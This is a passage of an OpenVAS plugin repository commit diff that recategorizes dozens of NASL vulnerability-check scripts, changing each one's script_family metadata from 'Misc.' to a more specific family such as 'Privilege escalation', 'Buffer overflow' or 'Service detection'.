scripts/pop2_unencrypted_cleartext_logins.nasl, + scripts/gb_opera_mult_vuln_oct08_win.nasl, + scripts/webshield_detect.nasl, + scripts/icecast_libshout_bof.nasl, + scripts/gb_thunderbird_mult_vuln_nov08_lin.nasl, + scripts/ident_process_owner.nasl, + scripts/secpod_blue_coat_k9_web_prot_bof_vuln_900103.nasl, + scripts/limewire_remote_unauth_access.nasl, + scripts/secpod_apple_safari_mult_vuln_july08_900002.nasl, + scripts/gb_seamonkey_mult_vuln_nov08_lin.nasl, + scripts/gb_sun_java_ws_code_exec_vuln_win.nasl, + scripts/secpod_expert_pdf_viewer_activex_file_overwrite_vuln_900174.nasl, + scripts/imss_detect.nasl, + scripts/apache_conn_block.nasl, + scripts/Allied_Telesyn_telnet.nasl, + scripts/DDI_AirConnect_Default_Password.nasl, + scripts/apache_htpasswd_overflow.nasl, + scripts/secpod_xine-lib_mult_vuln_aug08_900041.nasl, + scripts/secpod_nms_dvd_burning_sdk_actvx_vuln_900132.nasl, + scripts/gb_seamonkey_mult_vuln_july08_win.nasl, + scripts/aventail_asap.nasl, + scripts/apache_server_status.nasl, + scripts/gb_dovecot_mult_sec_bypass_vuln.nasl, + scripts/websense_detect.nasl, + scripts/qpopper2.nasl, + scripts/gb_opera_mult_vuln_oct08_lin.nasl, + scripts/gb_python_imageop_bof_vuln_win.nasl, + scripts/lcdproc_buffer_overflow.nasl, + scripts/gb_openoffice_senddoc_tmp_file_creation_vuln_lin.nasl, + scripts/DDI_LanRover_Blank_Password.nasl, + scripts/secpod_trendmicro_officescan_cgiparsing_bof_vuln_900164.nasl, + scripts/secpod_wireshark_mult_vuln_july08_lin_900011.nasl, + scripts/nortel_passport_default_pass.nasl, + scripts/4d_webstar_symb_link.nasl, + scripts/nortel_default_username_password.nasl, + scripts/secpod_mcafee_encrypt_usb_mngr_sec_bypass_vuln_900026.nasl, + scripts/oracle_enterprise_manager.nasl, + scripts/gb_vmware_tools_local_prv_esc_vuln_lin.nasl, + scripts/iss_deploymanager.nasl: + Updated script family as per CR #23. + +2009-10-05 Chandrashekhar B + * scripts/win_CVE-2008-0080.nasl, scripts/smbcl_CVE-2008-0234.nasl, scripts/win_CVE-2007-0043.nasl, Modified: trunk/openvas-plugins/scripts/3com_switches.nasl =================================================================== --- trunk/openvas-plugins/scripts/3com_switches.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/3com_switches.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -33,7 +33,7 @@ script_category(ACT_GATHER_INFO); script_copyright("This script is Copyright (C) 2001 Patrik Karlsson"); - script_family("Misc."); + script_family("Privilege escalation"); script_require_ports(23); exit(0); Modified: trunk/openvas-plugins/scripts/4d_webstar_symb_link.nasl =================================================================== --- trunk/openvas-plugins/scripts/4d_webstar_symb_link.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/4d_webstar_symb_link.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -41,7 +41,7 @@ script_copyright("This script is Copyright (C) 2004 David Maciejak"); - family = "Misc."; + family = "Remote file access"; script_family(family); script_dependencie("http_version.nasl"); script_require_ports("Services/www", 80, "Services/ftp", 21); Modified: trunk/openvas-plugins/scripts/Allied_Telesyn_telnet.nasl =================================================================== --- trunk/openvas-plugins/scripts/Allied_Telesyn_telnet.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/Allied_Telesyn_telnet.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -33,7 +33,7 @@ script_category(ACT_GATHER_INFO); script_copyright("This script is Copyright (C) 2005 Charles Thier"); - script_family("Misc."); + script_family("Privilege escalation"); script_require_ports(23); exit(0); Modified: trunk/openvas-plugins/scripts/DDI_AirConnect_Default_Password.nasl =================================================================== --- trunk/openvas-plugins/scripts/DDI_AirConnect_Default_Password.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/DDI_AirConnect_Default_Password.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -35,7 +35,7 @@ script_copyright("This script is Copyright (C) 2002 Digital Defense Inc."); - family = "Misc."; + family = "Privilege escalation"; script_family(family); script_dependencie("http_version.nasl"); script_require_keys("Services/www"); Modified: trunk/openvas-plugins/scripts/DDI_LanRover_Blank_Password.nasl =================================================================== --- trunk/openvas-plugins/scripts/DDI_LanRover_Blank_Password.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/DDI_LanRover_Blank_Password.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -41,7 +41,7 @@ script_copyright("This script is Copyright (C) 2002 Digital Defense Incorporated"); - family = "Misc."; + family = "Privilege escalation"; script_family(family); script_dependencie("find_service.nes"); Modified: trunk/openvas-plugins/scripts/apache_conn_block.nasl =================================================================== --- trunk/openvas-plugins/scripts/apache_conn_block.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/apache_conn_block.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -34,7 +34,7 @@ script_copyright("This script is Copyright (C) 2004 Scott Shebby"); - family = "Misc."; + family = "Denial of Service"; script_family(family); script_dependencie("http_version.nasl", "os_fingerprint.nasl"); script_require_keys("www/apache"); Modified: trunk/openvas-plugins/scripts/apache_htpasswd_overflow.nasl =================================================================== --- trunk/openvas-plugins/scripts/apache_htpasswd_overflow.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/apache_htpasswd_overflow.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -49,7 +49,7 @@ script_copyright("This script is Copyright (C) 2004 David Maciejak"); - family = "Misc."; + family = "Privilege escalation"; script_family(family); script_dependencie("http_version.nasl"); script_require_keys("www/apache"); Modified: trunk/openvas-plugins/scripts/apache_server_info.nasl =================================================================== --- trunk/openvas-plugins/scripts/apache_server_info.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/apache_server_info.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -31,7 +31,7 @@ script_copyright("This script is Copyright (C) 2001 StrongHoldNet"); - family = "Misc."; + family = "General"; script_family(family); script_dependencie("find_service.nes", "http_version.nasl"); script_require_ports("Services/www", 80); Modified: trunk/openvas-plugins/scripts/apache_server_status.nasl =================================================================== --- trunk/openvas-plugins/scripts/apache_server_status.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/apache_server_status.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -31,7 +31,7 @@ script_copyright("This script is Copyright (C) 2001 StrongHoldNet"); - family = "Misc."; + family = "General"; script_family(family); script_dependencie("find_service.nes", "http_version.nasl"); script_require_ports("Services/www", 80); Modified: trunk/openvas-plugins/scripts/avaya_switches.nasl =================================================================== --- trunk/openvas-plugins/scripts/avaya_switches.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/avaya_switches.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -32,7 +32,7 @@ script_category(ACT_GATHER_INFO); script_copyright("This script is Copyright (C) 2005 Charles Thier"); - script_family("Misc."); + script_family("Privilege escalation"); script_require_ports(23); exit(0); } Modified: trunk/openvas-plugins/scripts/aventail_asap.nasl =================================================================== --- trunk/openvas-plugins/scripts/aventail_asap.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/aventail_asap.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -33,7 +33,7 @@ script_copyright("This script is Copyright (C) 2005 David Maciejak"); - family = "Misc."; + family = "Service detection"; script_family(family); script_dependencie("http_version.nasl"); Modified: trunk/openvas-plugins/scripts/checkpoint_secureplatform.nasl =================================================================== --- trunk/openvas-plugins/scripts/checkpoint_secureplatform.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/checkpoint_secureplatform.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -33,7 +33,7 @@ script_copyright("This script is Copyright (C) 2005 David Maciejak"); - family = "Misc."; + family = "Brute force attacks"; script_family(family); script_dependencie("http_version.nasl"); Modified: trunk/openvas-plugins/scripts/defaultnavcheck.nasl =================================================================== --- trunk/openvas-plugins/scripts/defaultnavcheck.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/defaultnavcheck.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -26,7 +26,7 @@ script_category(ACT_ATTACK); script_copyright("This script is Copyright (C) 2004 Net-Square Solutions Pvt Ltd."); - family = "Misc."; + family = "General"; script_family(family); script_dependencie("find_service.nes"); Modified: trunk/openvas-plugins/scripts/fortigate_detect.nasl =================================================================== --- trunk/openvas-plugins/scripts/fortigate_detect.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/fortigate_detect.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -35,7 +35,7 @@ script_copyright("This script is Copyright (C) 2005 David Maciejak"); - family = "Misc."; + family = "General"; script_family(family); script_dependencie("http_version.nasl"); script_require_ports(443); Modified: trunk/openvas-plugins/scripts/gb_adobe_flash_player_sec_bypass_vuln_lin.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_adobe_flash_player_sec_bypass_vuln_lin.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/gb_adobe_flash_player_sec_bypass_vuln_lin.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -70,7 +70,7 @@ script_summary("Check for the version of Adobe Flash Player"); script_category(ACT_GATHER_INFO); script_copyright("Copyright (C) 2008 Intevation GmbH"); - script_family("Misc."); + script_family("General"); script_dependencies("gb_adobe_flash_player_detect_lin.nasl"); exit(0); } Modified: trunk/openvas-plugins/scripts/gb_apple_iphone_conf_web_utlty_dir_trvsl_vuln.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_apple_iphone_conf_web_utlty_dir_trvsl_vuln.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/gb_apple_iphone_conf_web_utlty_dir_trvsl_vuln.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -65,7 +65,7 @@ script_summary("Check for the version of iPhone Utility"); script_category(ACT_GATHER_INFO); script_copyright("Copyright (C) 2008 Intevation GmbH"); - script_family("Misc."); + script_family("General"); script_dependencies("secpod_reg_enum.nasl"); script_require_keys("SMB/WindowsVersion"); script_require_ports(139, 445); Modified: trunk/openvas-plugins/scripts/gb_dovecot_mult_sec_bypass_vuln.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_dovecot_mult_sec_bypass_vuln.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/gb_dovecot_mult_sec_bypass_vuln.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -67,7 +67,7 @@ script_summary("Check for the version of Dovecot"); script_category(ACT_GATHER_INFO); script_copyright("Copyright (C) 2008 Intevation GmbH"); - script_family("Misc."); + script_family("Privilege escalation"); exit(0); } Modified: trunk/openvas-plugins/scripts/gb_openoffice_rtl_allocatememory_bof_vuln_lin.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_openoffice_rtl_allocatememory_bof_vuln_lin.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/gb_openoffice_rtl_allocatememory_bof_vuln_lin.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -69,7 +69,7 @@ script_summary("Check for the version of OpenOffice"); script_category(ACT_GATHER_INFO); script_copyright("Copyright (C) 2008 Intevation GmbH"); - script_family("Misc."); + script_family("Buffer overflow"); script_dependencies("gather-package-list.nasl"); script_require_keys("ssh/login/uname"); exit(0); Modified: trunk/openvas-plugins/scripts/gb_openoffice_senddoc_tmp_file_creation_vuln_lin.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_openoffice_senddoc_tmp_file_creation_vuln_lin.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/gb_openoffice_senddoc_tmp_file_creation_vuln_lin.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -65,7 +65,7 @@ script_summary("Check for the version of OpenOffice"); script_category(ACT_GATHER_INFO); script_copyright("Copyright (C) 2008 Intevation GmbH"); - script_family("Misc."); + script_family("Remote file access"); exit(0); } Modified: trunk/openvas-plugins/scripts/gb_opera_cmd_exec_n_xss_vuln_lin.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_opera_cmd_exec_n_xss_vuln_lin.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/gb_opera_cmd_exec_n_xss_vuln_lin.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -67,7 +67,7 @@ script_summary("Check for the version of Opera Web Browser"); script_category(ACT_GATHER_INFO); script_copyright("Copyright (C) 2008 Intevation GmbH"); - script_family("Misc."); + script_family("General"); script_dependencies("secpod_opera_detection_linux_900037.nasl"); exit(0); } Modified: trunk/openvas-plugins/scripts/gb_opera_mult_vuln_oct08_lin.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_opera_mult_vuln_oct08_lin.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/gb_opera_mult_vuln_oct08_lin.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -70,7 +70,7 @@ script_summary("Check for the version of Opera Web Browser"); script_category(ACT_GATHER_INFO); script_copyright("Copyright (C) 2008 Intevation GmbH"); - script_family("Misc."); + script_family("General"); script_dependencies("secpod_opera_detection_linux_900037.nasl"); exit(0); } Modified: trunk/openvas-plugins/scripts/gb_opera_mult_vuln_oct08_win.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_opera_mult_vuln_oct08_win.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/gb_opera_mult_vuln_oct08_win.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -70,7 +70,7 @@ script_summary("Check for the version of Opera Web Browser"); script_category(ACT_GATHER_INFO); script_copyright("Copyright (C) 2008 Intevation GmbH"); - script_family("Misc."); + script_family("General"); script_dependencies("secpod_opera_detection_win_900036.nasl"); exit(0); } Modified: trunk/openvas-plugins/scripts/gb_python_imageop_bof_vuln_win.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_python_imageop_bof_vuln_win.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/gb_python_imageop_bof_vuln_win.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -62,7 +62,7 @@ script_summary("Check for the version of Python"); script_category(ACT_GATHER_INFO); script_copyright("Copyright (C) 2008 Intevation GmbH"); - script_family("Misc."); + script_family("Buffer overflow"); script_dependencies("secpod_reg_enum.nasl"); script_require_keys("SMB/WindowsVersion"); script_require_ports(139, 445); Modified: trunk/openvas-plugins/scripts/gb_seamonkey_mult_vuln_july08_win.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_seamonkey_mult_vuln_july08_win.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/gb_seamonkey_mult_vuln_july08_win.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -94,7 +94,7 @@ script_summary("Check for the version of Seamonkey"); script_category(ACT_GATHER_INFO); script_copyright("Copyright (C) 2008 Intevation GmbH"); - script_family("Misc."); + script_family("General"); script_dependencies("gb_seamonkey_detect_win.nasl"); exit(0); } Modified: trunk/openvas-plugins/scripts/gb_seamonkey_mult_vuln_nov08_lin.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_seamonkey_mult_vuln_nov08_lin.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/gb_seamonkey_mult_vuln_nov08_lin.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -72,7 +72,7 @@ script_summary("Check for the version of Seamonkey"); script_category(ACT_GATHER_INFO); script_copyright("Copyright (C) 2008 Intevation GmbH"); - script_family("Misc."); + script_family("General"); script_dependencies("gb_seamonkey_detect_lin.nasl"); exit(0); } Modified: trunk/openvas-plugins/scripts/gb_streamripper_mult_bof_vuln_nov08_lin.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_streamripper_mult_bof_vuln_nov08_lin.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/gb_streamripper_mult_bof_vuln_nov08_lin.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -70,7 +70,7 @@ script_summary("Check for the Version of Streamripper"); script_category(ACT_GATHER_INFO); script_copyright("Copyright (C) 2008 Intevation GmbH"); - script_family("Misc."); + script_family("Buffer overflow"); exit(0); } Modified: trunk/openvas-plugins/scripts/gb_sun_java_ws_code_exec_vuln_win.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_sun_java_ws_code_exec_vuln_win.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/gb_sun_java_ws_code_exec_vuln_win.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -67,7 +67,7 @@ script_summary("Check for the Version of Sun Java Web Start"); script_category(ACT_GATHER_INFO); script_copyright("Copyright (C) 2008 Intevation GmbH"); - script_family("Misc."); + script_family("General"); script_dependencies("secpod_reg_enum.nasl"); script_require_keys("SMB/WindowsVersion"); script_require_ports(139, 445); Modified: trunk/openvas-plugins/scripts/gb_thunderbird_mult_vuln_nov08_lin.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_thunderbird_mult_vuln_nov08_lin.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/gb_thunderbird_mult_vuln_nov08_lin.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -69,7 +69,7 @@ script_summary("Check for the version of Thunderbird"); script_category(ACT_GATHER_INFO); script_copyright("Copyright (C) 2008 Intevation GmbH"); - script_family("Misc."); + script_family("General"); script_dependencies("gb_thunderbird_detect_lin.nasl"); exit(0); } Modified: trunk/openvas-plugins/scripts/gb_tikiwiki_input_sanitation_weak_vuln.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_tikiwiki_input_sanitation_weak_vuln.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/gb_tikiwiki_input_sanitation_weak_vuln.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -65,7 +65,7 @@ script_summary("Check for the Version of TikiWiki CMS/Groupware"); script_category(ACT_GATHER_INFO); script_copyright("Copyright (C) 2008 Intevation GmbH"); - script_family("Misc."); + script_family("Web application abuses"); script_require_ports("Services/www", 80); exit(0); } Modified: trunk/openvas-plugins/scripts/gb_vmware_prdts_prv_esc_vuln.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_vmware_prdts_prv_esc_vuln.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/gb_vmware_prdts_prv_esc_vuln.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -82,7 +82,7 @@ script_summary("Check for the version of VMware Products"); script_category(ACT_GATHER_INFO); script_copyright("Copyright (C) 2008 Intevation GmbH"); - script_family("Misc."); + script_family("Privilege escalation"); script_dependencies("gb_vmware_prdts_detect_lin.nasl"); exit(0); } Modified: trunk/openvas-plugins/scripts/gb_vmware_tools_local_prv_esc_vuln_lin.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_vmware_tools_local_prv_esc_vuln_lin.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/gb_vmware_tools_local_prv_esc_vuln_lin.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -79,7 +79,7 @@ script_summary("Check for the version of VMware Products"); script_category(ACT_GATHER_INFO); script_copyright("Copyright (C) 2008 Intevation GmbH"); - script_family("Misc."); + script_family("Privilege escalation"); script_dependencies("gb_vmware_prdts_detect_lin.nasl"); exit(0); } Modified: trunk/openvas-plugins/scripts/gb_w3c_amaya_mult_bof_vuln_dec08_lin.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_w3c_amaya_mult_bof_vuln_dec08_lin.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/gb_w3c_amaya_mult_bof_vuln_dec08_lin.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -68,7 +68,7 @@ script_summary("Check for the Version of W3C Amaya Web Browser"); script_category(ACT_GATHER_INFO); script_copyright("Copyright (C) 2008 Intevation GmbH"); - script_family("Misc."); + script_family("Buffer overflow"); exit(0); } Modified: trunk/openvas-plugins/scripts/icecast_avllib_bof.nasl =================================================================== --- trunk/openvas-plugins/scripts/icecast_avllib_bof.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/icecast_avllib_bof.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -44,7 +44,7 @@ script_copyright("This script is Copyright (C) 2004 David Maciejak"); - family = "Misc."; + family = "Buffer overflow"; script_family(family); script_dependencie("http_version.nasl"); script_require_ports("Services/www", 8000); Modified: trunk/openvas-plugins/scripts/icecast_libshout_bof.nasl =================================================================== --- trunk/openvas-plugins/scripts/icecast_libshout_bof.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/icecast_libshout_bof.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -46,7 +46,7 @@ script_copyright("This script is Copyright (C) 2004 David Maciejak"); - family = "Misc."; + family = "Buffer overflow"; script_family(family); script_dependencie("http_version.nasl"); script_require_ports("Services/www", 8000); Modified: trunk/openvas-plugins/scripts/ident_process_owner.nasl =================================================================== --- trunk/openvas-plugins/scripts/ident_process_owner.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/ident_process_owner.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -23,7 +23,7 @@ script_category(ACT_GATHER_INFO); script_copyright("This script is Copyright (C) 2004 Michel Arboi"); - family = "Misc."; + family = "Service detection"; script_family(family); script_dependencie("find_service1.nasl", "slident.nasl"); script_require_ports("Services/auth", 113); Modified: trunk/openvas-plugins/scripts/imss_detect.nasl =================================================================== --- trunk/openvas-plugins/scripts/imss_detect.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/imss_detect.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -32,7 +32,7 @@ script_copyright("This script is Copyright (C) 2005 David Maciejak"); - family = "Misc."; + family = "Service detection"; script_family(family); script_dependencie("httpver.nasl"); script_require_ports("Services/www", 80); Modified: trunk/openvas-plugins/scripts/iss_deploymanager.nasl =================================================================== --- trunk/openvas-plugins/scripts/iss_deploymanager.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/iss_deploymanager.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -35,7 +35,7 @@ script_copyright("This script is Copyright (C) 2005 David Maciejak"); - family = "Misc."; + family = "General"; script_family(family); script_dependencie("http_version.nasl"); Modified: trunk/openvas-plugins/scripts/lcdproc_buffer_overflow.nasl =================================================================== --- trunk/openvas-plugins/scripts/lcdproc_buffer_overflow.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/lcdproc_buffer_overflow.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -40,7 +40,7 @@ script_category(ACT_DESTRUCTIVE_ATTACK); script_copyright("This script is Copyright (C) 2000 SecuriTeam"); - family = "Misc."; + family = "Buffer overflow"; script_family(family); script_dependencie("find_service.nes"); script_require_ports("Services/lcdproc", 13666); Modified: trunk/openvas-plugins/scripts/limewire_remote_unauth_access.nasl =================================================================== --- trunk/openvas-plugins/scripts/limewire_remote_unauth_access.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/limewire_remote_unauth_access.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -34,7 +34,7 @@ script_category(ACT_GATHER_INFO); script_copyright("This script is Copyright (C) 2005 David Maciejak"); - family = "Misc."; + family = "Peer-To-Peer File Sharing"; script_family(family); script_dependencie("http_version.nasl", "os_fingerprint.nasl"); script_require_ports(6346); Modified: trunk/openvas-plugins/scripts/nortel_default_username_password.nasl =================================================================== --- trunk/openvas-plugins/scripts/nortel_default_username_password.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/nortel_default_username_password.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -27,7 +27,7 @@ script_category(ACT_GATHER_INFO); - script_family("Misc."); + script_family("Privilege escalation"); script_copyright("This script is Copyright (C) 2004 Noam Rathaus"); Modified: trunk/openvas-plugins/scripts/nortel_passport_default_pass.nasl =================================================================== --- trunk/openvas-plugins/scripts/nortel_passport_default_pass.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/nortel_passport_default_pass.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -29,7 +29,7 @@ script_category(ACT_ATTACK); script_copyright("This script is Copyright (C) 2002 Rui Bernardino"); - family = "Misc."; + family = "Privilege escalation"; script_family(family); script_require_ports(23); Modified: trunk/openvas-plugins/scripts/notesinicheck.nasl =================================================================== --- trunk/openvas-plugins/scripts/notesinicheck.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/notesinicheck.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -19,7 +19,7 @@ script_summary(summary); script_category(ACT_ATTACK); script_copyright("This script is Copyright (C) 2004 Net-Square Solutions Pvt Ltd."); - family = "Misc."; + family = "Web application abuses"; script_family(family); script_dependencie("http_version.nasl"); script_require_ports("Services/www", 80); Modified: trunk/openvas-plugins/scripts/oracle_enterprise_manager.nasl =================================================================== --- trunk/openvas-plugins/scripts/oracle_enterprise_manager.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/oracle_enterprise_manager.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -34,7 +34,7 @@ script_copyright("This script is Copyright (C) 2005 David Maciejak"); - family = "Misc."; + family = "Brute force attacks"; script_family(family); script_dependencie("http_version.nasl"); Modified: trunk/openvas-plugins/scripts/pop2_unencrypted_cleartext_logins.nasl =================================================================== --- trunk/openvas-plugins/scripts/pop2_unencrypted_cleartext_logins.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/pop2_unencrypted_cleartext_logins.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -28,7 +28,7 @@ script_category(ACT_GATHER_INFO); script_copyright("This script is Copyright (C) 2004 George A. Theall"); - family = "Misc."; + family = "General"; script_family(family); script_dependencie("find_service.nes", "global_settings.nasl"); Modified: trunk/openvas-plugins/scripts/qpopper2.nasl =================================================================== --- trunk/openvas-plugins/scripts/qpopper2.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/qpopper2.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -39,7 +39,7 @@ script_copyright("This script is Copyright (C) 2002 Thomas Reinke"); - family = "Misc."; + family = "Buffer overflow"; script_family(family); script_dependencie("find_service.nes"); Modified: trunk/openvas-plugins/scripts/secpod_apple_safari_mult_vuln_july08_900002.nasl =================================================================== --- trunk/openvas-plugins/scripts/secpod_apple_safari_mult_vuln_july08_900002.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/secpod_apple_safari_mult_vuln_july08_900002.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -29,7 +29,7 @@ script_copyright("Copyright 2008 SecPod"); script_version("Revision: 1.2 "); script_category(ACT_GATHER_INFO); - script_family("Misc."); + script_family("General"); script_name("Apple Safari for Windows Multiple Vulnerabilities July-08"); script_summary("Check for Apple Safari version"); desc = " Modified: trunk/openvas-plugins/scripts/secpod_blue_coat_k9_web_prot_bof_vuln_900103.nasl =================================================================== --- trunk/openvas-plugins/scripts/secpod_blue_coat_k9_web_prot_bof_vuln_900103.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/secpod_blue_coat_k9_web_prot_bof_vuln_900103.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -31,7 +31,7 @@ script_copyright("Copyright (C) 2008 SecPod"); script_version("$Revision: 1.1 $"); script_category(ACT_GATHER_INFO); - script_family("Misc."); + script_family("Buffer overflow"); script_name("Blue Coat K9 Web Protection Multiple Buffer Overflow Vulnerabilities"); script_summary("Check for vulnerable version and prior of Blue Coat"); desc = " Modified: trunk/openvas-plugins/scripts/secpod_expert_pdf_viewer_activex_file_overwrite_vuln_900174.nasl =================================================================== --- trunk/openvas-plugins/scripts/secpod_expert_pdf_viewer_activex_file_overwrite_vuln_900174.nasl 2009-10-05 10:31:15 UTC (rev 5371) +++ trunk/openvas-plugins/scripts/secpod_expert_pdf_viewer_activex_file_overwrite_vuln_900174.nasl 2009-10-05 10:46:42 UTC (rev 5372) @@ -30,7 +30,7 @@ script_copyright("Copyright (C) 2008 SecPod"); script_version("Revision: 1.0 "); script_category(ACT_GATHER_INFO); - script_family("Misc."); + script_family("Remote file access"); script_name("Visagesoft eXPert PDF Viewer ActiveX Control File Overwrite Vulnerability"); script_summary("Check for vulnerable version of eXPert PDF Viewer ActiveX"); desc = " Modified: trunk/openvas-plugins/scripts/secpod_mcafee_encrypt_usb_mngr_sec_bypass_vuln_900026.nasl =================================================================== --- 